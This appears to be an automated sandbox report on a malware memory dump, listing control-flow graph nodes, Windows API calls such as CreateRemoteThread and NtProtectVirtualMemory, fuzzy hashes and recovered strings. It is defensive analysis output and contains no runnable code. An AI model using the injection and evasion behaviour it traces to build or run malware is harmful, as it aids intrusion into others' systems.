14468->14469 14471 48cddd 14468->14471 14470 49879c 2 API calls 14469->14470 14470->14471 14471->14310 14722 49dcb4 14723 49dcf2 14722->14723 14724 49dd30 14723->14724 14725 4a62bc 3 API calls 14723->14725 14726 49dd62 14724->14726 14728 49c73c 14724->14728 14725->14724 14729 49c767 14728->14729 14730 49c855 14729->14730 14733 49c771 14729->14733 14732 4a8554 3 API calls 14730->14732 14731 49c823 14731->14726 14732->14731 14733->14731 14735 49dee4 14733->14735 14736 482e84 2 API calls 14735->14736 14737 49df19 14736->14737 14737->14731

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationQueryToken$Close
                                        • String ID: 0
                                        • API String ID: 459398573-4108050209
                                        • Opcode ID: 13bb166f2edcac1c63535b73b73ac0494bee6c2390724b3bdfaeb3c95e5c4449
                                        • Instruction ID: d422d1966cd1af43199ec8916fbc912da10811257527e8d722cd403bca2a6fba
                                        • Opcode Fuzzy Hash: 13bb166f2edcac1c63535b73b73ac0494bee6c2390724b3bdfaeb3c95e5c4449
                                        • Instruction Fuzzy Hash: 50310B306187498FD764EF59D8C5BAAB7E2FBD8311F50493EE88AC3214DB349945CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 48 4963e0-49645f 51 496461-496493 call 48fde4 48->51 52 496495-496496 48->52 54 496498-49649b 51->54 52->54 56 49701e-49703a 54->56 57 4964a1-4964ca CreateMutexExA 54->57 60 4964e8-4964eb 57->60 61 4964cc-4964d1 57->61 64 49701b-49701c 60->64 65 4964f1-496518 60->65 62 4964d3-4964e0 61->62 63 4964e5-4964e6 61->63 62->64 63->60 64->56 68 4965df-4965e0 65->68 69 49651e-49656a 65->69 70 4965e2-4965e5 68->70 82 49656c-496573 69->82 83 496581-496591 69->83 70->56 71 4965eb-49662c 70->71 75 4966d0-4966d1 71->75 76 496632-496638 71->76 80 4966d3-4966d6 75->80 77 49663a-496648 76->77 78 4966a6-4966ce call 4a687c 76->78 81 49664a-496692 77->81 78->80 80->56 85 4966dc-4966f7 GetUserNameA 80->85 86 49669e-4966a4 81->86 87 496694-496698 81->87 82->83 88 496575-49657b call 49f128 82->88 89 496597-4965c0 83->89 91 4966f9-496715 85->91 92 496728-49673a 85->92 86->78 86->81 87->86 88->83 101 4965c2-4965dd 89->101 91->92 102 496717-496720 91->102 93 49673c-496741 92->93 94 496743-49678c 92->94 93->94 96 4967ae-4967b3 93->96 110 49679f-4967a0 94->110 111 49678e-496797 94->111 103 4967f5-4967f8 96->103 104 4967b5-4967d6 96->104 101->70 102->92 105 4967fa-49680a call 4a1c0e 103->105 106 49680f-496846 103->106 116 4967d8-4967df 104->116 117 4967ea-4967f2 104->117 105->106 114 496848-496868 106->114 115 4968bd 106->115 120 4967a8 110->120 122 49679d 111->122 123 4968e0-4968ec 111->123 130 49686e-496892 call 487c90 114->130 119 4968c2-4968c5 115->119 116->117 121 4967e1-4967e8 116->121 117->103 119->56 124 4968cb-4968ce 119->124 120->96 121->103 122->120 126 4968ee-49691f call 493e2c 123->126 127 496966-496978 call 485b28 123->127 128 4968d0 call 4ab608 124->128 129 4968d7-4968da 124->129 126->127 141 496921-496929 126->141 142 49697a-4969ab call 493e2c 127->142 143 4969b2-4969c4 call 49887c 127->143 138 4968d5 128->138 129->56 129->123 139 496899-49689f 130->139 140 496894-496897 130->140 138->129 145 4968af 139->145 146 
4968a1-4968ab 139->146 140->139 141->127 147 49692b-496960 call 4926cc 141->147 154 4969ad-4969ae 142->154 155 4969cc-496a13 call 497ca8 call 4a1860 142->155 143->155 151 4968b4-4968bb 145->151 146->130 150 4968ad 146->150 147->127 150->151 151->119 154->143 162 496a3c-496a3f call 4aa2cc 155->162 163 496a15-496a34 155->163 166 496a44-496a49 162->166 163->162 166->56 167 496a4f-496a68 166->167 167->56 169 496a6e-496a96 167->169 171 496a98-496aad 169->171 172 496abc-496ae6 call 48ac68 169->172 171->172 176 496aaf-496ab7 171->176 177 496ae8-496af0 172->177 178 496af5-496b04 172->178 176->56 177->56 179 496b0a-496b40 call 4a687c 178->179 180 496dcd-496dd4 178->180 198 496b4d-496b50 179->198 199 496b42-496b49 179->199 182 496dda-496dfe call 482e84 180->182 183 496f5c-496f65 180->183 195 496ea1-496ec2 call 482e84 182->195 196 496e04-496e24 call 49e334 182->196 183->64 184 496f6b-496f70 183->184 187 496fe2-497010 call 48ac68 184->187 188 496f72-496f75 184->188 187->177 207 497016-497018 187->207 191 496f87-496fa4 188->191 192 496f77-496f81 188->192 191->187 211 496fa6-496fd8 191->211 192->191 195->183 208 496ec8-496ee5 call 49e334 195->208 196->195 209 496e26-496e33 196->209 198->56 205 496b56-496c23 call 49d64c * 4 198->205 199->198 233 496c91-496c94 205->233 234 496c25-496c2c 205->234 207->64 208->183 218 496ee7-496ef4 208->218 213 496e8f-496e99 209->213 214 496e35-496e7a call 4a83c4 call 4aa09c 209->214 211->187 213->195 214->213 236 496e7c-496e8a call 48bc1c 214->236 221 496f4a-496f54 218->221 222 496ef6-496f3c call 4a83c4 call 4aa09c 218->222 221->183 222->221 245 496f3e-496f45 call 4abdcc 222->245 233->56 237 496c9a-496ca1 233->237 234->233 238 496c2e-496c49 234->238 236->213 241 496cb8-496cd7 237->241 242 496ca3-496cb2 237->242 247 496c4b-496c51 238->247 248 496c53-496c7f call 48ac68 238->248 250 496cd9-496d12 call 4a1298 241->250 251 496d17-496d57 241->251 242->241 245->221 256 496c8f 247->256 248->233 258 496c81-496c87 248->258 250->251 259 496d59-496d76 call 
48ac68 251->259 260 496d9a-496da0 251->260 256->233 258->256 266 496d78-496d7d 259->266 267 496d7f-496d98 259->267 265 496da2-496da5 260->265 265->56 268 496dab-496db6 265->268 266->265 267->265 268->183 270 496dbc-496dc8 call 489338 268->270 270->183
                                        APIs
                                        • CreateMutexExA.KERNEL32(-00000001,0049D986), ref: 004964AD
                                        • GetUserNameA.ADVAPI32 ref: 004966E6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateMutexNameUser
                                        • String ID:
                                        • API String ID: 3764123871-0
                                        • Opcode ID: 5c9796a6900e177ec60b050334b91349d620bc42450a5b038705803160e6450c
                                        • Instruction ID: 28e0794307dea01af43592522badecc597dcf66e2112b43f271315e423575877
                                        • Opcode Fuzzy Hash: 5c9796a6900e177ec60b050334b91349d620bc42450a5b038705803160e6450c
                                        • Instruction Fuzzy Hash: 2A72A570618A158FEB19EF28EC855BA77E1F798710711853ED48BC3261DE3CE942CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 326 49d6f0-49d726 327 49d728-49d730 326->327 328 49d732-49d733 326->328 329 49d735-49d75a HeapCreate 327->329 328->329 331 49d75c-49d75f 329->331 332 49d764-49d78e 329->332 333 49d988-49d98b 331->333 337 49d7ef-49d7f5 332->337 338 49d790-49d798 332->338 335 49d9e9-49da02 333->335 336 49d98d-49d9b8 333->336 336->335 342 49d9ba-49d9d1 336->342 343 49d7f7-49d7f9 337->343 344 49d79a-49d7a3 338->344 345 49d7a7 338->345 342->335 355 49d9d3-49d9de 342->355 343->333 346 49d7ff-49d824 call 499ddc 343->346 347 49d7a9-49d7e6 344->347 348 49d7a5 344->348 345->347 349 49d7e8-49d7ed 345->349 356 49d83b 346->356 357 49d826-49d82b 346->357 347->343 348->345 349->343 355->335 358 49d9e0-49d9e8 355->358 361 49d840-49d847 356->361 359 49d82d-49d832 357->359 360 49d834-49d839 357->360 358->335 359->360 363 49d84e-49d850 359->363 360->361 361->363 363->333 365 49d856-49d88d 363->365 367 49d893-49d8a6 call 4a1c0e 365->367 368 49d934 365->368 374 49d8a8-49d8b9 367->374 375 49d8fa 367->375 370 49d939-49d943 368->370 370->333 371 49d945-49d95d call 48bb1c 370->371 371->333 379 49d95f-49d981 call 495700 call 49c35c 371->379 377 49d8bb-49d8f0 call 4a83c4 374->377 378 49d901-49d909 375->378 386 49d8f2-49d8f8 377->386 381 49d90b-49d91b 378->381 382 49d91d-49d932 378->382 389 49d986 379->389 381->370 382->370 386->378 389->333
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID: .bss
                                        • API String ID: 10892065-3890483948
                                        • Opcode ID: bcb695e513be0e9aada754749e1a2981e9d9c3b14060af814ceaafec8049f9d2
                                        • Instruction ID: f6f0396509ebe894f361e3898ca158636b16c2ec0e28234ee0a516cd5c91688e
                                        • Opcode Fuzzy Hash: bcb695e513be0e9aada754749e1a2981e9d9c3b14060af814ceaafec8049f9d2
                                        • Instruction Fuzzy Hash: 1D81B770B18B054FEB18EF69A8897A777D5FB94315F04813EE88AC3261DE78D8428785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL ref: 004BD27A
                                        • NtProtectVirtualMemory.NTDLL ref: 004BD309
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.723108296.00000000004BD000.00000040.80000000.00040000.00000000.sdmp, Offset: 004BD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_4bd000_control.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 6ea80581febb14541cae0c6372c58aaf20c897dd6a38cb38723a699da10b087a
                                        • Instruction ID: d6f73aae4b9b69bdd7f53191a12554d8823f3d61369a8a27f061ff5b70eccc9c
                                        • Opcode Fuzzy Hash: 6ea80581febb14541cae0c6372c58aaf20c897dd6a38cb38723a699da10b087a
                                        • Instruction Fuzzy Hash: C7A1053160CBC84FC729DF28C8816A6B7E1FB96314F5845AFD4CBC7252E638E8068756
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        APIs
                                        • NtSetInformationProcess.NTDLL ref: 004934C3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationProcess
                                        • String ID:
                                        • API String ID: 1801817001-0
                                        • Opcode ID: d6d84e3bb9dd6a3a32229d93f8a1402ec101a5eec1c7a21b6302d409a679c35e
                                        • Instruction ID: 237f027f3f7bcbed4e514d1553c53ecb72fe47fc262b08910454e69a06f27012
                                        • Opcode Fuzzy Hash: d6d84e3bb9dd6a3a32229d93f8a1402ec101a5eec1c7a21b6302d409a679c35e
                                        • Instruction Fuzzy Hash: B241D67071CA049FDB54EF68D8996667BE1FB9D311B41453EE80AC3261EF38D901CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00494E3A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID:
                                        • API String ID: 1778838933-0
                                        • Opcode ID: c503bf7d7d7a019e0c860b740dfeab7730271f63f23cf6932b594c406d3ab55a
                                        • Instruction ID: 25f9766362e2ded6a9d31626f53a1b618d3de8650da760066714052881b20e10
                                        • Opcode Fuzzy Hash: c503bf7d7d7a019e0c860b740dfeab7730271f63f23cf6932b594c406d3ab55a
                                        • Instruction Fuzzy Hash: 4D011D30614A0D8FDFD4EF68D4C5E6677E4FBE8305B50057EA40AC7264D628D886CB46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 004A0A6D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID:
                                        • API String ID: 1778838933-0
                                        • Opcode ID: ba1bc30c40748ce948f6a65f135ead804c1aaee94283eeae431a27c628f6e2b2
                                        • Instruction ID: f635bab6b4843b8c3c73793ec4df1d348620c78049d41bc42525f206c312074c
                                        • Opcode Fuzzy Hash: ba1bc30c40748ce948f6a65f135ead804c1aaee94283eeae431a27c628f6e2b2
                                        • Instruction Fuzzy Hash: DDE08630A04A084BCF4CEB6CDCCD56473D2FB98301F64456ED50ACB159D534D5894B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        APIs
                                        • Part of subcall function 00482E84: RegCreateKeyA.ADVAPI32(?,?,00000027,0049D6DF), ref: 00482EA7
                                        • RegQueryValueExA.KERNELBASE ref: 00497D1C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateQueryValue
                                        • String ID: ($(
                                        • API String ID: 2711935003-222463766
                                        • Opcode ID: d7db21f0d3aee69494936f9fdaba2ea910a32f97dffb48d077b5270f4ba7ff74
                                        • Instruction ID: 1c08fdf26345deb2dbdce4b183b519f088a281284fc02e1fa436b1b68ec3f99f
                                        • Opcode Fuzzy Hash: d7db21f0d3aee69494936f9fdaba2ea910a32f97dffb48d077b5270f4ba7ff74
                                        • Instruction Fuzzy Hash: C64194346687488FFB48EF58E884AA677E5FB98309F00852ED48AC3260DB7CD941CB45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: QueryValue$AllocateHeap
                                        • String ID:
                                        • API String ID: 2311914766-0
                                        • Opcode ID: 691f6accf525634dd8e852d428e426211876acad570e19402203f4706332e8cf
                                        • Instruction ID: fa8751163aefe36cd42953dc13b196ca0ca7e1a4e8492c2dbdb176e4a2bf4600
                                        • Opcode Fuzzy Hash: 691f6accf525634dd8e852d428e426211876acad570e19402203f4706332e8cf
                                        • Instruction Fuzzy Hash: 6F31AE7161CB088FEB58EF18D489666B3E1FBA8301F15452EE84EC3252DF34E845CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: H
                                        • API String ID: 1029625771-2852464175
                                        • Opcode ID: d09c529806326730a3c2b824ec72db9bb745c8df5574f8816ad0a225f454d2ce
                                        • Instruction ID: 35fa4ee124165c4c4607694462f7c62dda04bd3a37c42401e5abf4ec3d83e6d3
                                        • Opcode Fuzzy Hash: d09c529806326730a3c2b824ec72db9bb745c8df5574f8816ad0a225f454d2ce
                                        • Instruction Fuzzy Hash: FAA17F70508F098FE755DF28D8897B6B7E1FBA9305F00462ED88AC7261EF78D9418B85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: BoundaryDeleteDescriptorlstrcmp
                                        • String ID:
                                        • API String ID: 735288309-0
                                        • Opcode ID: a035d7e6160fc5933013b099fdcea635bafb3ef4c34cb4e37c1e5d9712410046
                                        • Instruction ID: 813ceaa7f858eb74800f0d8c079118f080cdca0a6c7948c481b02decbe422668
                                        • Opcode Fuzzy Hash: a035d7e6160fc5933013b099fdcea635bafb3ef4c34cb4e37c1e5d9712410046
                                        • Instruction Fuzzy Hash: F8511531A1CA484FDB2CAE589C8A27A7BD1E789314F54853FD9CAC3321D9289C4387C6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        APIs
                                        • Part of subcall function 004AAE0C: VirtualProtect.KERNELBASE ref: 004AAE3F
                                        • VirtualProtect.KERNELBASE ref: 0048FCB5
                                        • VirtualProtect.KERNELBASE ref: 0048FCD8
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 8ea83be550972cb450592169f40a817b38715dbbb1922746b1f8c87917cf9e29
                                        • Instruction ID: 367965dd821ab09bda3267acfa040ed278ffab5e36845f6bd085cf842d70411d
                                        • Opcode Fuzzy Hash: 8ea83be550972cb450592169f40a817b38715dbbb1922746b1f8c87917cf9e29
                                        • Instruction Fuzzy Hash: B5517170618F098FDB54EF19D88576AB7E0FB5C315F10056EA84EC3261DB38E945CB8A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        APIs
                                        • StrRChrA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,0049D986), ref: 0049C3CF
                                        • RtlAddVectoredContinueHandler.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,0049D986), ref: 0049C4C3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ContinueHandlerVectored
                                        • String ID:
                                        • API String ID: 3758255415-0
                                        • Opcode ID: b28ead03b6f17f077c7dc345d89b0409a2fd3f2d37b0af1fd57a6036940bf9cd
                                        • Instruction ID: 1019684eeb72bfdba2835faf63656a7172d8a497b8bc30dfbd3fbab115cb41a8
                                        • Opcode Fuzzy Hash: b28ead03b6f17f077c7dc345d89b0409a2fd3f2d37b0af1fd57a6036940bf9cd
                                        • Instruction Fuzzy Hash: 8F41D630618A058FEB55EF3998A86FA7BD2EB98314B41813ED446C32A1DF3CD945C745
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID:
                                        • API String ID: 47109696-0
                                        • Opcode ID: cf0eea27d486248f014806f930f76e3e3fc097b1d19b2d7a851f237fce4887c9
                                        • Instruction ID: 881d3ee48de94526a5cb8bed8032e423904d31f452325c79fd06850945dfc1d3
                                        • Opcode Fuzzy Hash: cf0eea27d486248f014806f930f76e3e3fc097b1d19b2d7a851f237fce4887c9
                                        • Instruction Fuzzy Hash: 76314031618F0C8FC794EF6CD894A6A73E1FBA8305B414A7EA04EC3261DB38D944C786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 9778043a067b8a527297b0f87568c0098e8f9f1ff45dfcd7ca02eb2e6cd67be0
                                        • Instruction ID: a17a1e4e24f91cd6076bff9cff57bb498816b787bff5d1a6cfe9983ecfdb99f4
                                        • Opcode Fuzzy Hash: 9778043a067b8a527297b0f87568c0098e8f9f1ff45dfcd7ca02eb2e6cd67be0
                                        • Instruction Fuzzy Hash: 09215131618B088FE754EF29E84966577E1FB98311F10456EE849C3361DA74DC41CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(?,?,00000027,0049D6DF), ref: 00482EA7
                                        • RegOpenKeyA.ADVAPI32(?,?,00000027,0049D6DF), ref: 00482EB4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateOpen
                                        • String ID:
                                        • API String ID: 436179556-0
                                        • Opcode ID: 0c972040c102cc2f42c03aa901a81eabdfe5d1137f8b427ae3f6b9032299b1a0
                                        • Instruction ID: 2fd9a561415142ae9fda471e1a554ab3f78b1fcecf9d3bb925da0ec4b2ab5f1c
                                        • Opcode Fuzzy Hash: 0c972040c102cc2f42c03aa901a81eabdfe5d1137f8b427ae3f6b9032299b1a0
                                        • Instruction Fuzzy Hash: 7F018830618A144FDB45EB5CD448B2AB7E5FBE8351F10042EE94DC3360DBB4C945C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (graph image not reproduced)
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: ba3dc00b23c375a8afa08ad11b738f538cec6448654b2d0f9f9c204c69557505
                                        • Instruction ID: d239d1d6a88214a9e680a7ec4a61698bfa8ff2de25dd5dbf1dcf4e6638ab90dc
                                        • Opcode Fuzzy Hash: ba3dc00b23c375a8afa08ad11b738f538cec6448654b2d0f9f9c204c69557505
                                        • Instruction Fuzzy Hash: 52616830518F099FEB54FF18E48962A77E0FB68311B60456FE84AC3651DB78EC52CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlDeleteBoundaryDescriptor.NTDLL ref: 004AB74E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: BoundaryDeleteDescriptor
                                        • String ID:
                                        • API String ID: 3203483114-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateRemoteThread.KERNELBASE ref: 004AB804
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateRemoteThread
                                        • String ID:
                                        • API String ID: 4286614544-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 004957AC
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                        • API String ID: 0-647159250
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O*<m$yPjD
                                        • API String ID: 0-4099160962
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HTTP$POST
                                        • API String ID: 0-4028717631
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: L$L
                                        • API String ID: 0-138625451
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K$P
                                        • API String ID: 0-420285281
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: P
                                        • API String ID: 0-3110715001
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: vids
                                        • API String ID: 0-3767230166
                                        Uniqueness

